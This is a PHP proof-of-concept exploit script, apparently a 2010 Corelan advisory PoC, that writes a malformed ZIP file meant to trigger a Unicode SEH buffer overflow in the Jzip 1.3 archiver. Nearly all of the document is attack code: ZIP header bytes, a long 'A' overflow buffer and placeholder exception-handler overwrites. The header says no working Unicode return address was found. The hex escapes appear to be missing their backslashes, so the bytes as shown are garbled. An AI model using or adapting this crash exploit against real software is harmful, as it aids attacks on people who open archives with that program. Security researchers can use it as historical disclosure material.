<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC
Date: 6/4/2010
Author: mr_me (http://net-ninja.net/)
Software Link: http://www.jzip.com/
Version: 1.3
Tested on: Windows XP SP3 En
Advisory: http://www.corelan.be:8800/advisories.php?id=10-021
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: 
jzip.exe and all associated modules are compiled with safeseh and combine that
with the unicode limitation proves very difficult for exploitation. We did not 
find a working unicode address, otherwise this vulnerability would have been 
alot more fun! The seven moons were not aligned as Ben puts it :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !

Note : you are not allowed to edit/modify this code.  
If you do, Corelan cannot be held responsible for any damages this may cause.
*/

$lf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00";

$cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

$efcdr_record = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00x02x10x00x00x00x00";

$___offset = 4064;
$___nseh = str_repeat("x43",2);
$___seh = str_repeat("x44",2);

$___exploit = str_repeat("x41",810).
$___nseh.
$___seh;
$___exploit .= 
str_repeat("x41",$___offset-strlen($___exploit)).
"x2ex74x78x74";

$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("cst-jzip.zip",$_____b00m);
?>